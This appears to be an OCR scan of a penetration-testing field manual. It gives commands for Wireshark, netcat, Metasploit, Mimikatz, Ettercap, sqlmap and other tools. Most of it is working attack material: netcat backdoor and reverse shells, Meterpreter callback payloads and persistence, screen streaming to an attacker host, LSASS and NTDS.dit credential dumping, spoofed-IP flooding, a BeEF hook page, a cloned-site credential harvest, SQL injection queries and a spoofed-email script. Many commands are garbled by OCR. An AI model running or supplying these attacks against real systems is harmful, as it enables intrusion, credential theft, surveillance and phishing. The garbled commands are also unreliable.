LbobD.DODL/tOD.dstDOrE/tcp.srcport TCP ports 

tcp.flags (ack,fin,push,reset,syn,urg) TCP flags 
udp.port/udp.dstport/udp.srcport UDP ports 
http.authbasic Basic authentication 
http.www authentication HTTP authentication 
http.data HTTP data portion 
http.cookie HTTP cookie 
http.reterer HTTP referer 
http.server HTTP Server 

Htcp.user agent HTTP user agent string 
wlan.fc.type eq O 802.11 management frame 
wlan.fc.type eq 1 802.11 control frame 
wlan.fc.type eq O 802.11 data frame 
wlan.fc.type subtype eq 0 (1“reponse) 802.11 association request 
wlan.fe,type subtype eq 2 (3-response) 802.11 reassociation req 
wlan.fc.type subtype eq 4 (5-response) 802.11 probe request 
wlan.fc.type subtype eq 8 802.11 beacon 
wlan.fc.type subtype eq 10 802.11 disassociate 
wlan.fc.type subtype eq 11 (12-deauthenticate) 802.11 authenticate 


COMPARISON OPERATORS 


eq OR -- 
ne OR != 
gia OR... 
lt OR 

Qe ON. += 
le OR = 


LOGICAL OPERATORS 


and OR && 
or OR || 
xor OR ^^ 
not OR ! 
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NETCAT 


BASICS 


Connect to [TargetIP] Listener on [port]: 
$ nc [TargetIP] [port] 


Start Listener: 
$ nc -1 -p [port] 


PORT SCANNER 


TCP Port Scanner. in port fange [startPort] to: [endPort]: 


Some even oz —wl PTargetiPli [sStartPort]-[endPort] 


FILE TRANSFERS 


Grab a [filename] from a Listener: 


dize Start Listener to push [filename] 
bone lp" sort] (filenamel 

Zu Connect to [TargetIP] and Retrieve [filename] 
$ nc -w3 [TargetIP] [port] - [filename] 


Push a [filename] to Listener: 


1; Start Listener to pull [filename] 
SMC sel. ə [port] [filename] 

25 Connect to [TargetIP] and push [filename] 
Snc -w3 [TargetIP] [port] . [filename] 


BACKDOOR SHELLS 


Linux Shell: 
$ nc -1 -p [port] -e /bin/bash 


Linux Reverse Shell: 
$ nc [LocalIP] [port] -e /bin/bash 


Windows Shell: 
$ nc -l -p [port] -e cmd.exe 


Windows Reverse Shell: 
$ nc [LocalIP] [port] -e cmd.exe 
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VLC STREAMING 


# Use cvlc (command line VLC) on target to mitigate popups 


CAPTURE AND STREAM THE SCREEN OVER UDP TO <ATTACKERIP>: 1234 


# Start a listener on attacker machine 
vlc udp://@:1234 


-— OR - 


# Start a listener that stores the stream in a file. 

vlc udp://@:1234 :soutsi#transcode(vcodec=h264, vb=0, scale=0, acodec=mp4a, 
ab=128, channels=2, samplerate=44100):file(dst=test.mp4) :no-sout-rtp-sap 
:no-sout-standard-sap :ttl=1 :sout-keep 


# This may make the users screen flash. Lower frame rates delay the video. 
vlc screen:// :screen-fps-25  :screen-caching-100 

:sout=#transcode {vcodec=h264, vb=0, scale=0, acodec=mp4a, ab=128, channels=2, sam 

plerate=44100} :udp(dst= attackerip-:1234) :no-sout-rtp-sap :no-sout- 

standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM THE SCREEN OVER HTTP 


# Start a listener on attacker machine 
vlc http://server.example.org:8080 


-— OR - 


# Start a listener that stores the stream to a file 

vlé http://server.example.org:8080 -- 
sout=#transcode {vcodec=h264, vb=0, scale=0, acodec=mp4a, ab=128, channels=2, samp 
lerate=44100}:file{dst=test.mp4} 


# Start streaming on target machine 

- vlc screen:// :screen-fps=25  :screen-caching-100 
:sout=ftranscode(vcodec=h264, vb=0, scale=0, acodec=mp4a, ab=128, channels=2, sam 
plerate=44100) :http{mux=ffmpeg{mux=flv},dst=:8080/} :no-sout-rtp-sap :no- 
sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM OVER BROADCAST 


# Start a listener on attacker machine for multicast 
vlc udp://@-multicastaddr.-:1234 


# Broadcast stream to a multicast address 

vlc screen:// :screen-fps=25  :screen-caching-100 
:sout=#transcode {vcodec=h264, vb=0O, scale=0, acodec=mp4a, ab=128, channels=2, sam 
plerate=44100} :udp(dst=.multicastaddr.:1234) :no-sout-rtp-sap :no-sout- 
standard-sap :ttl=l :sout-keep 


CAPTURE AND RECORD YOUR SCREEN TO A FILE 


vlc screen:// :screen-fps=25 :screen-caching=100 
:sout=#transcode(vcodec=h264, vb=0, scale=0, acodec=mp4a, ab=128, channels=2, sam 
plerate=44100}:file{dst=C:\\Program Files (x86) \\VideoLAN\\VLC\\test.mp4} 
:no-sout-rtp-sap :no-sout-standard-sap :ttl=1 :sout-keep 


CAPTURE AND STREAM THE MICROPHONE OVER UDP 


vlc dshow:// :dshow-vdev="None" :dshow-adev="Your Audio Device" 
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SSH 


/etc/ssh/ssh known hosts #System-wide known hosts 
^/.ssh/known hosts #Hosts user has logged into 
sshd-generate #Generate SSH keys (DSA/RSA) 
ssh keygen -t dsa -f /etc/ssh/ssh host dsa key #Generate SSH DSA keys 
ssh keygen -t rsa -f /etc/ssh/ssh host rsa key #Generate SSH RSA keys 
Y If already in ssh session, press SHIFT -C to configure tunnel 

v Port forwarding must be allowed on target 

v /etc/ssh/sshd config -. AllowTcpForwarding YES 


To ESTABLISH AN SSH CONNECTION ON DIFFERENT PORT 


s SSILqdQOOUEZ-2.292 cp. 8222 


SETUP X11 FORWARDING FROM TARGET, FROM ATTACK BOX RUN 
` xhost+ 


: vi »/.ssh/config - Ensure “ForwardXll yes” 
seh -—X rootü2.2.2:2 


REMOTE PORT FORWARD ON 8080, FORWARD TO ATTACKER ON 443 

| ces RSOUBOST2U.DIOXIJISA443 cOOUSP.2.2.2: 

LOCAL PORT FORWARD ON PORT 8080 ON ATTACK BOX AND FORWARDS 
THROUGH SSH TUNNEL TO PORT 3300 ON INTERNAL TARGET 3.3.3.3 
“ ssh -L8080:3.3.3.3:443 root@2.2.2.2 

DYNAMIC TUNNEL USED IN CONJUNCTION WITH PROXYCHAINS. ENSURE 
/ETC/PROXYCHAINS.CONF IS CONFIGURED ON CORRECT PORT (1080) 
» ssh -D1080 rooti2.2.2.2 


In a separate terminal run: 
- proxychauirns mmap- SST “p80,443 3.3.3.9 
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METASPLOIT 


Load resource file 

ist Windows exploits 

ist available encoders 
ist available payloads 
Isplay exploits 

İsplay auxiliary modules 
Isplay payloads 

Search for string 

how module information 
oad exploit or module 
Displays module options 
Displays advanced options 
ets a value 


sessions List session: -k # (kill) 
-u # (upgrade to Meterpreter) 
Sessions -s script Run Meterpreter script on all 
sessions 


List all jobs EID 
route add "p: msr 
re ave həy interpreter tell — —— 


connect ip. 443 SSL connect (NC clone) 


route - “ipə «mask: -session id: Add route through session (pivot) 


exploit/multi/handler - Advanced option allows for multiple 
set ConsoleLogging true (also Enables logging 
SessionLogging) 


CREATE ENCODED METERPRETER PAYLOAD (FoR LINUX: -T ELF —O 
CALLBACK) 


ın 


E! 


ml c2 


un 


./msfpayload windows/meterpreter/reverse tcp LHOST--ip» LPORT--port. R | 
./msfencode -t exe -o callback.exe -e x86/shikata ga nai -c 5 


CREATE BIND METERPRETER PAYLOAD 


./msfpayload windows/meterpreter/bind tcp RHOST--ip- LPORT--port- X - 
cb.exe 


CREATE ENCODED PAYLOAD USING MSFVENOM USING EXE TEMPLATE 


./msfvenom --payload windows/meterpreter/reverse tcp --format exe -- 
template calc.exe -k --encoder x86/shikata ga nai -i 5 LHOST-1.1.1.1 
LPORT-443 . callback.exe 


5:6 


START MSF DB (BT5 = mysoL, KALI = POSTGRESQL) 


/etc/rc.d/rc.mysqld start 

; msf.. db create root:pass@localhost/metasploit 
msf. load db mysql 

msf- db connect root:pass@localhost/metasploit 
msf. db import  nmap.xml 


--- Kali --- 


# service postgresql start 
# service metasploit start 


PASS A SHELL (BY DEFAULT WILL LAUNCH NOTEPAD AND INJECT) 


msf. use post/windows/manage/multi meterpreter inject 
msf- set IPLIST attack ip. 
msf set LPORT .callback port 


set PIDLIST PID to inject, default creates new notepad 
msf- set PAYLOAD windows/meterpreter/reverse tcp 
msf. set SESSION meterpreter session ID 


HTTP BANNER SCAN ON INTERNAL NETWORK 


msf- route add .ip/range netmask.  meterpreter ID 


msf. use post/multi/gather/ping sweep # Set options and run 
msf. use /auxiliary/scanner/portscan/tcp # Set options and run 
nere hosts UF KK SR # Searches for x.x.x.* 
# RHOSTS 
msf. use auxiliary/scanner/http/http version # Set options and run 
mest services -v -p 80 -S X.X.X =R # Displays IPS x.x.x.* with port 
# 80 open 


METERPRETER 


List available commands 
Display system info 

List processes 

List current PID 

Upload file 

Download file 

Interact with registry 
Revert to original user 
Drop to interactive shell 
Migrate to another PID 
Background current session 
Start/Stop/Dump keylogger 
Execute cmd.exe and interact 


execute -f cmd.exe -i -H -t Execute cmd.exe as hidden process 
and with all tokens 


Dumps local hashes 
SELL IDE Executes script 
portfwd [add|delete]-L 127.0.0.1 -1 Port forward 3389 through session. 


PRIVILEGE ESCALATION 


use priv 
getsysten 


IMPERSONATE TOKEN (DROP TOKEN WILL STOP IMPERSONATING) 


use incognito 
list tokehs “u 
impersonate token domain\\user 


NMAP THROUGH METERPRETER SOCKS PROXY 


dig msf- sessions # Note Meterpreter ID 
2. ME fw roüte-add 3.9.3.0 255:255:259540 1d- 
E msf. use auxiliary/server/socks4a 
4. msf. run 
S. Open new shell and edit /etc/proxychains.conf 

i. #proxy dns 

ii. #socks4 127.0.0.1 9050 

iii. socks4 Vide 1080 

6. Save and Close conf file 


s 


proxyochains. nmap “s? «Ph -p80,135,449 3.3.2.3 


RAILGUN - WINDOWS API CALLS TO POP A MESSAGE BOX 


meterpreter irb 
client.railgun.user32.MessageBoxA(O,"got","you","MB OK") 
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CREATE PERSISTENT WINDOWS SERVICE 


msf. 
msf- 
msf. 
msf. 
msf- 
msf- 
msf” 


use 
set 
set 
set 
set 
set 
set 


post/vindovs/manage/persistence 
LHOST -attack ip. 

LPORT - callback port 

PAYLOAD TYPE =» TØP| HTTP |ATES 
REXENAME filename. 

SESSION meterpreter session id 
STARTUP SERVICE 


GATHER RECENTLY ACCESSED FILES AND WEB LINKS 


meterpreter. run post/windows/gather/dumplinks 


SPAWN NEW PROCESS AND TREE C:N 


> execute -H -f cmd.exe -a “/c tree /F /A c:N . C:NtempNtree.txt' 


yo 


ETTERCAP 


MAN-IN-THE-MIDDLE WITH FILTER 


ettercap.exe -I -iface. -M arp -Tq -F file.ef -MACs-/-IPs-/:Ports- 
MACs.-/.IPs.-/- Ports: 
#i.e.: //80,443 // = any MAC, any IP, ports 80,443 


MAN-IN-THE-MIDDLE ENTIRE SUBNET WITH APPLIED FILTER 


. ettercap -T -M arp -F : filter: // // 


SWITCH FLOOD 


ettercap -TP rand flood 


ETTERCAP FILTER 


COMPILE ETTERCAP FILTER 


; etterfilter filter.filter -o out.ef 


SAMPLE FILTER - KILLS VPN TRAFFIC AND DECODES HTTP TRAFFIC 


if (ip.proto == UDP && udp.dst == 500) { 
drop(); 
KELLGG S 
if (ip.src == “-ip.”)1( 
if (tcp.dst == 80)( 


if (search(DATA.data, "Accept-Encoding"))( 
replace("AccepL-Encooing","Accebt-Rubblish!" 5; 
msg("Replaced Encoding\n"); 

) 
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MIMIKATZ 


ka Upload mimikatz.exe and sekurlsa.dll to target 
2. execute mimikatz 
3. mimikatz# privilege::debug 
4. mimikatz# inject::process lsass.exe sekurlsa.dll 
5. mimikatzf @getLogonPasswords 
HPING3 
DOS FROM SPOOFED IPS 
+ hping3 *+targetIP» *-flood >=frag —-Spoot ip —-destport .#. = 
ARPING 
ARP SCANNER 
./arping -I eth# -a # arps. 
WINE 


COMPILE EXE IN BACKTRACK 


cd /root/.wine/drive c/MinGW/bin 
wine gcc -o -file.exe. /tmp/ code.c 
wine .file.exe 


GRUB 


CHANGE ROOT PASSWORD 


GRUB Menu:Add 'single' end of kernel line. Reboot. Change root pass. reboot 


HYDRA 


ONLINE BRUTE FORCE 


s hydra —Ll ftp -P words -v. “targetIP:: ftp 


o 


JOHN THE RIPPER 


CRACKING WITH A WORDLIST 


$ ./john -wordfile:pw.lst -format:-format. hash.txt 


FORMAT EXAMPLES 


$ john --format-des username:SDbsugeBiC58A 
$ john --format-lm username:S$SIMSa9c604d244c4e99d 
$ john --formatemd5 $1$12345678$alcc?83HRDBo6uxlbVx7D1 


$ john --format=raw-shal A9993E364706816ABA3E25717850C26C9CDOD89D 


# For --format=netlmv2 replace SNETLM with SNETLMv2 

$ john --format=netlm 
SNETLM$1122334455667788$0836FO85B124F33895875FB1951905DD2F85252CC731BB25 
username:$NETLMŞ1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC” 
31BB25 

username :$NETLMŞ1122334455667788$0836F085B124F33895875FB1951905DD2F85252CC?” 


b Exactly 36 spaces between USER and HASH (SAPB and SAPG) 

$ john --format=sapb 

ROOT $8366A4E9E6B72CBO 

username : ROOT $8366AAE9E6B72CBO 


$ john --format=sapg 

ROOT Ş1194E38F14B9F3FSDAİIBISIF14DEB7OE”BDCC239 
username:ROOT 

Ş1194E38F14B9F3FSDA1BIS1IF14DEB”OE”BDCC239 


$ john --format=shal-gen 
SSHAlp$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789 
username:$SHAlpSsalt$59b3e8d637cf97edbe2384cf59cb7453dfe30789 
$ john --format=zip 


SzipS*0*1^*8005b1b7d077708d*dee4 
username:$zip$”0“1:8005b1573077708d”dee4 


PASSWORD WORDLIST 


GENERATE WORDLIST BASED OFF SINGLE WORD 


# Add lower (@), upper(,), number(%), and symbol(^) to the end of the word 
- crunch 12 12 -t baseword@,%° -. wordlist.txt 


# Use custom special character set and add 2 numbers then special character 
. maskprocessor -custom-charset1=V!NAVHNS baseword?d?d?1 .- wordlist.txt 
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EP 


an 


19% 


Create 


VSSOWN [21 


Download: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs 


a new Shadow Copy 
a.  cscript vssown.vbs /start (optional) 
b.  cscript vssown.vbs /create 


Pull the following files from a shadow copy: 


a. copy 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy [X] \windows\ 
ntds\ntds.dit 

D copy 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy [X] \windows\ 
system32\config\SYSTEM 

c. COPY 
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy [X] \windows\ 
system32\config\SAM 


Copy files to attack box. 
Download tools: http://www.ntdsxtract.com/downloads/ntds dump hash.zip 
Configure and Make source code for libesedb from the extracted package 


a. cd libesedb 


b. chmod +x configure 
e. ./configure && make 
Use esedbdumphash to extract the datatable from ntds.dit. 
a. cd esedbtools 
b. ./esedbdumphash ../../ntds.dit 


8a.Use 
SYSTEM 


8b.Use 
SYSTEM 


dsdump.py to dump hashes from datatable using bootkey from 
hive 

a. cd ../../creddump/ 

b. python ./dsdump.py ../SYSTEM 

../libesedb/esedbtools/ntds.dit.export/datatable 

bkhive and samdump2 to dump hashes from SAM using bootkey from 
hive. 

a.  bkhive SYSTEM key.txt 

b. samdump2 SAM key.txt 


Dump historical hashes 


a. python ./dsdumphistory.py ../system 
../libesedb/esedbtools/ntds.dit.export/datatable 
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FILE HASHING 


HASH LENGTHS 
MD5 16 bytes 
SHA-1 20 bytes 


SHA-256 32 bytes 
SHA-512 64 bytes 


SOFTWARE HASH DATABASE 
http://isc.sans.edu/tools/hashsearch.html 


# dig +short -md5:.md5.dshield.org TXT 
Result = " filename. | source " i.e. "cmd.exe | NIST" 


MALWARE HASH DATABASE 
http://www.team-cymru.org/Services/MHR 


# dig +short [MD5|SHA-1].malware.hash.cymru.com TXT 
Result - .last seen timestamp AV detection rate. 
Convert timestamp = perl -e “print scalar localtime(-timestamp-), "\n"’ 


FILE METADATA SEARCH 


https://fileadvisor.bit9.com/services/search.aspx 


SEARCH VIRUSTOTAL DATABASE 


https://www.virustotal.com/#search 
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WEB 


COMMON USER-AGENT STRINGS 


Mozilla/4.0 (compatible; MSIE 6.0; Windows TE: 6.0/WLinxP 32-bit 

NT 5.173 SVI) 

Mozilla/4.0 (compatible; MSIE 7.0; Windows IE 7.0/WinXP 32-bit 

NI S.J SVIS- 30ET-&IR 250550) 

Mozilla/4.0 (compatible; MSIE 8.0; Windows IE 8.0/WinVista 32-bit 


NT 6.0; Trident/4.0; Mozilla/4.0 
(compatible; MSIE 6.0; Windows NT 5.1; SVI) 
f NET GER 35543079) 


Mozilla/5.0 (compatible; MSIE 9.0; Windows IE 9,0/Win: 32-bit 
NT 6.1; Trident/5.0) 
Mozilla/5.0 (compatible; MSIE 9.0; Windows IE 9.0/Win? 64-bit 


NT 6.1; WOW64; Trident/5.0 

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Firefox 5.0/Win? 64-bit 
Gecko/20100101 Firefox/5.0 

Mozilla/5.0 (Windows NT 5.1; rv:13.0) Firefox 13.0/WinXP 32-bit 
Gecko/20100101 Firefox/13.0.1 

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Firefox 17.0/Win7 64-bit 
Gecko/20100101 Firefox/17.0 

Mezillada/5.0«. (Xll; Ubuntu? Linux 296 647 Firefox 17.0/Linux 
rv:17.0) Gecko/20100101 Firefox/17.0 

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; Firefox 17.0/MacOSX 10.7 
rv:l17,.0) Gecko/20100101 Eirefox/l.0 

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; Firefox 17.0/MacOSX 10.8 


.0) Gecko/20100101 .0 


Firefox/] 


Mozilla/5.0 (Windows NT 5.1) Chrome Generic/WinXP 
AppleWebKit/537.11 (KATML, like Gecko) 

Chrome/23.0.1271.97 Safari/537.11 

. Mozilla/5.0 (Windows NT 6.1) Chrome Generic/Win” 
AppleNebKit/537.11 (KHTML, like Gecko) 

Chrone 23 .0:1271497 Sasfari/537,4,ll 


Mozilla/5.0 (X11; Linux x86 64) Chrome Generic/Linux 
AppleNebKit/537.11 (KHTML, like Gecko) 

Chrome/23.0.1271.97 Safari/53" AT 

Mozilla/5.0 (Macintosh; Intel Mac OS X Chrome Generic/MacOSX 
10 8 2) ApplewebKit/537.11 (KHTML, like 

Gecko) Chrome/23.0.1271.101 Safari/537:.11 

Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome 13.0/Win7 64-bit 
AppleWebKit/535.1 (KHTML, like Gecko) 

Chrome/13.0.7982.112 Safari/535.1 


Mozilla/5.0 (Macintosh; Intel Mac OS X 
10 7 5) AppleWebKit/536.26.17 (KHTML, like 
Gecko) Version/6.0.2 Safari/536.26.17 


6.0/MacOSX 


Safari 


Mozilla/5.0 (iPad; CPU OS 6 0 1 like Mac OS Mobile 
X) AppleWebKit/536.26 (KHTML, like Gecko) 

Version/6.0 Mobile/10A523 Safari/8536.25 

Mözilla/5.0 (iPhone; CPU iPhone OS 6 0.4 Mobile Safari 6.0/108 
like Mac OS X) AppleWebKit/536.26 (KHTML, (iPhone) 

like Gecko) Version/6.0 Mobile/10A523 

Safari/8536.25 

Mozrlla/5.0 (Linux? “OU; Android 2.2? fr-fr; Mobile Safari 4.0/Android 
Desire A8181 Build/FRF91) App3leWebKit/53.1 

(KHTML, like Gecko) Version/4.0 Mobile 

Safari/533.1 


Safari 6.0/iOS (iPad) 


HTML 


HTML BEEF HOOK WITH EMBEDDED FRAME 
- !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"- 


html. 
--head.- 
-title.Campaign Title: /title- 
SSCHRIDES 
var commandModuleStr = ':script src="' + vindov.location.protocol + 
"//" + window.location.host + ':8080/hook.js" 
type-"text/javascript". \/script-'; 
document.write (commandModuleStr); 


//Site_refresh=window.setTimeout (function () (window.location.href="http://ww 
w.google.com/'},20000); 
“ASCFIDE: 
:/head:- 
.frameset rows="*,1px"- 
-frame src="http://www.google.com/" frameborder=0 
noresize="noresize" /. 
frame src="/e" frameborder=0 scrolling=no noresize=noresize /- 
 /frameset. 
/html. 


EMBEDDED JAVA APPLET (* PLACE WITHIN «BODY» TAG) 


applet archive="legit.jar" code="This is a legit applet" width="1" 
height="1". /applet. 


EMBEDDED IFRAME 
iframe src="http://1.1.1.1" width="O" height="O" frameborder="0" 


tabindex="-1" title="empty" styleevisibility:hidden,display:none": 
./iframe - 


FIREFOX TYPE CONVERSIONS 


ASCII -. Base64 javascript:btoa("ascii str") 

Base64 -. ASCII javascript:atob("base64==") 

ASCII -— URL javascript:encodeURI ("script") 

URI == ASCTI Javascript:decodeURI ("$3cscript$3E") 
WGET 


CAPTURE SESSION TOKEN 


wget -q --save-cookies=cookie.txt --keep-session-cookies --post- 
data-"username:admin&password-pass&Login-Login" http://-url:/login.php 
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CURL 


GRAB HEADERS AND SPOOF USER AGENT 


curl -I -X HEAD -A "Mozilla/5.O (compatible; MSIE 7.01; Windows NT 5.0)" 
HEED?7/./” s 


SCRAPE SITE AFTER LOGIN 


curl -u user:pass -o outfile https://login.bob.com 


FTP 


curl ftp://user:pass@bob.com/directory/ 


SEQUENTIAL LOOKUP 


curl http;//bob.com/£file[|l-I0].txt 


BASIC AUTHENTICATION USING APACHE2 


The steps below will clone a website and redirect after 3 seconds to 
another page requiring basic authentication. It has proven very useful for 
collecting credentials during social engineering engagements. 


1. Start Social Engineering Toolkit (SET) 
/pentest/exploits/set/./set 
2. Through SET, use the “Website Attack Vector' menu to clone your 


preferred website. “ Do not close SET * 

EN In a new terminal create a new directory (lowercase L) 
. mkdir /var/www/l 

4. Browse to SET directory and copy the cloned site 


cd /pentest/exploits/set/src/web_clone/site/template/ 
cp index.html /var/www/index.html 
cp index.html /var/www/l/index.html 
5. Open /var/www/index.html and add tag between head. tags 
meta httprequiv="refresh" 
content="3;url=http:// domainlip /l/index.html"/ 
6. Create blank password file to be used for basic auth 
touch /etc/apache2/.htpasswd 
Open /etc/apache2/sites-available/default and add: 
- Directory /var/www/l- 
AuthType Basic 
AuthName "PORTAL LOGIN BANNER" 
AuthUserFile /etc/apache2/.htpasswd 
Require user test 
/Directory 
Bi Start Apache2 
/etc/init.d/apache2 start 
9. Start Wireshark and add the filter: 
http.authbasic 
10. Send the following link to your target users 
http://-domainlip-/index.html 
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AUTOMATED WEB PAGE SCREENSHOTS 


NMAP WEB PAGE SCREENSHOTS [9] 


Install dependencies: 


ə wget http://vkhtmltopdf.googlecode.com/files/vkhtmltoimage-0.11.0 rcl- 
static-1386,Far; bz? 


ə tår *JxvE wENtmItoimage=0O. 11.0. fEI=SEaEtè=1386.Tar,bz2 
e cp vkhtmltoimage-i386 /usr/local/bin/ 


Install Nmap module: 

e git clone git://github.com/SpiderLabs/Nmap-Tools.git 
e cd Nmap-Tools/NSE/ 

e cp http-screenshot.nse /usr/local/share/nmap/scripts/ 
e nmap --script-updatedb 


OS/version detection using screenshot script (screenshots saved as .png): 


e nmap -A -script-http-screenshot -p80,443 1.1.1.0/24 -oA nmap- 
screengrab 


Script will generate HTML preview page with all screenshots: 
#!/bin/bash 


printf " HTML.--BODY.-«BR-" - previev.html 

is «L *.png | ak Er 14 print 91":"S2" An«BR.sIMG-SRCSV'"SRIU'SSA" US2UAM 
vidthe400- BR-.BR-")" - preview.html 

printf "-/BODY.--/HTML." .... previev.html 


PEEPINGTOM VEB PAGE SCREENSHOTS 


Install Dependencies: 
ə Download Phantomjs 
https://phantomjs.googlecode.com/files/phantomjs-1.9.2-linux-x86 64.tar.bz2 


e Download PeepingTom 
git clone https://bitbucket.org/LaNMaSteR53/peepingtom.git 


Extract and copy phantomjs from phantomjs$-1.9.2-11nux-x96 04.tar.Dz2 and 
Copy to peepingtom directory 


e Run PeepingTom 
python peepingtom.py http://-mytarget. con. 


SQLMAP 


GET REQUEST 


./sqlmap.py -u "http:// url ?id=l&str=val" 


POST REQUEST 


./sqlmap.py -u "http:// url." --data-"id-1&str-val" 


SQL INJECTION AGAINST SPECIFIC PARAMETER WITH DB TYPE SPECIFIED 


./sqlmap.py -u "http:// url." --data="id=l&str=val" -p "id" 
-b --dbms=" mssqlimysqlloracle |postgres " 


SQL INJECTION ON AUTHENTICATED SITE 
Tog Login and note cookie value (cookiel=vall, cookie2=val2) 


./sqlmap.py -u "http:// url " --datae"idelestreval" -p "id" 
--cookie="cookiel=vall;cookie2=val2" 


SQL INJECTION AND COLLECT DB VERSION, NAME, AND USER 


wÈsalmap.py 0 "https// url" «-data-"id-l&ástr-val" "p id" “b --current-db 
c*ODDPenmbuser 


SQL INJECTION AND GET TABLES OF DB=TESTDB 


./sqlmap.py -u "http:// url." --data="id=l&str=val" -p "id" --tables -D 
"testdb" 


SQL INJECTION AND GET COLUMNS OF USER TABLE 


./sqlmap.py -u "http:// url." -—-data="id=l&str=val" -p "id" --columns -T 
"users" 


DATABASES 


MS-SQL 


SELECT @@version DB version 
EXEC xp msver Detailed version info 
EXEC master..xp cmdshell 'net user' Run OS command 
SELECT HOST NAME() Hostname & IP 
SELECT DB NAME () Current DB 
SELECT name FROM master..sysdatabases; List DBs 
SELECT User. nemes) Current user 
SELECT name FROM master..syslogins List users 
SELECT name FROM master..sysobjects WHERE List tables 
xtype="U"; 

SELECT name FROM syscolumns WHERE id=(SELECT List columns 


id FROM sysobjects WHERE name="mytable"); 


SYSTEM TABLE CONTAINING INFO ON ALL TABLES 


SELECT TOP 1 TABLE NAME FROM INFORMATION SCHEMA.TABLES 


LIST ALL TABLES /COLUMNS 


SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE 
name = 'mytable') 


PASSWORD HASHES (2005) 


SELECT name, password hash FROM master.sys.sql logins 


POSTGRES 
SELECT version(); DB version 
SELECT inet server addr() Hostname & IP 
SELECT Gurrent databaser: Current DB 
SELECT datname FROM pg database; List DBs 
SELECT user; Current user 
SELECT username FROM pg user; List users 
SELECT username, passwd FROM pg shadow List password hashes 


LIST COLUMNS 


SELECT relname, A.attname FROM pg class C, pg namespace N, pg attribute A, 
pg type T WHERE (C.relkind-'r') AND (N.oid-C.relnamespace) AND 
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum-O) AND (NOT 
A.attisdropped) AND (N.nspname ILIKE public”) 


LIST TABLES 


SELECT c.relname FROM pg catalog.pg class c LEFT JOIN 

pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN 
(‘r’,") AND n.nspname NOT IN (“pg catalog', “pg toast”) AND 

på catalog:pgotable TE. vISIGIS(E:.o1rd) 


MYSOL 


SELECT @@version; DB version 

SELECT @@hostname; Hostname & IP 

SELECT database(); Current DB 

SELECT distinct (db) FROM mysql.db; List DBs 

SELECT user(); Current user 

SELECT user FROM mysql.user; List users 

SELECT host, user, password FROM mysql.user; List password hashes 


LIST ALL TABLES & COLUMNS 


SELECT table schema, table name, column name FROM 
information schema.columns WHERE 
table schema != 'mysql' AND table schema != 'information schema' 


ExECUTE OS coMMAND THROUGH MYSQL 


osql -S 'ip.,-port. -U sa -P pud -Q "exec xp cmdshell “net user /add user 
pass' " 


READ WORLD-READABLE FILES 


we” UNION ALL SELECT LOAD FILE("'/etc/passwd'); 


WRITE TO FILE SYSTEM 


SELECT * FROM mytable INTO dumpfile “/tmp/somefile” 


No 


ORACLE 
SELECT * FROM vSversion; DB version 
SELECT version FROM v$instance, DB version 
SELECT instance name FROM vSinstance; Current DE 
SELECT name FROM v$database, Current DB 
SELECT DISTINCT owner FROM all tables; List DBs 
SELECT user FROM dual; Current user 
SELECT username FROM all users ORDER BY List users 
username; 
SELECT column name FROM all tab columns; List columns 
SELECT table name FROM all tables; List tables 
SELECT name, password, astatus FROM sys.user$; List password hashes 
LIST DBAS 
SELECT DISTINCT grantee FROM dba sys privs WHERE ADMIN OPTION = 'YES'; 


— 


PROGRAMMING 


PYTHON 


PYTHON PORT SCANNER 


import socket as sk 
for port in rånge(l; 1024): 
try: 
s=sk.socket(sk.AF INET,sk.SOCK STREAM) 
s.settimeout (1000) 
Sszconnectit!12 0:05,17, BOKEN) 
print "$5d:0PEN" $ (port) 
s.close 
except: continue 


PYTHON BASE64 WORDLIST 


#! /usr/bin/python 

import base64 

fileleopeén("pwd.lst", En 

file2=open ("b64pwds.1st","w") 

For TRÈ 18 Filel: 
clear = "administrator:" + str.strip(line) 
new = base64.encodestring (clear) 
file2.write (new) 


CONVERT WINDOWS REGISTRY HEX FORMAT TO READABLE ASCII 
import binascii, sys, string 


dataFormatHex — binascii.a2b hex(sys.argvlll) 
output = "" 
for echar in datakFofmatHex: 
if char in string.printable: output += char 
$ else: output += "." 
i BEINE "int" «GUut put 


READ ALL FILES IN FOLDER AND SEARCH FOR REGEX 


import glob, re 
for msg in glòbsgiéb itmpr* txt): 


filer = open((msg),”r”) 
data = filer.read() 
message = re.findall(r’ message (.'?) /message ', data,re.DOTALL) 


print "File ès contains $s" $ (str(msg),message) 
filer.close() 


SSL ENCRYPTED SIMPLEHTTPSERVER 


# Create SSL cert (follow prompts for customization) 
» openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes 


# Create httpserver.py 
import BaseHTTPServer,SimpleHTTPServer,ssl 


cert = "cert.pem" 


httpd = BaseHTTPServer.HTTPServer(('192.168.1.10', 443), 
SimpleHTTPServer.SimpleHTTPRequestHandler) 

httpd.socket = ssl.wrap socket(httpd.socket,certfile=cert, server side=True) 
httpd.serve forever() E 


PYTHON HTTP SERVER 


python -m SimpleHTTPServer 8080 


PYTHON EMAIL SENDER (“ SENDMAIL MUST BE INSTALLED) 


#! /usr/bin/python 
import smtplib, string 
import os, time 


os.system("/etc/init.d/sendmail start") 
time.sleep (4) 


HOST = "localhost" 

SUBJECT = "Email from spoofed sender" 
TO = "targetüyou.com" 

FROM = "spoof@spoof.com" 

TEXT = "Message Body" 


BODY = string.join(( 

"From: ès" $ FROM, 

"Tor es" co, 

"Subject: $s" % SUBJECT, 

.. 

TEXT 

) A ANDE) 
server = smtplib.SMTP(HOST) 
server.sendmail(FROM, [TO], BODY) 
server.quit() 


time.sleep (4) 
os.system("/etc/init.d/sendmail stop") 


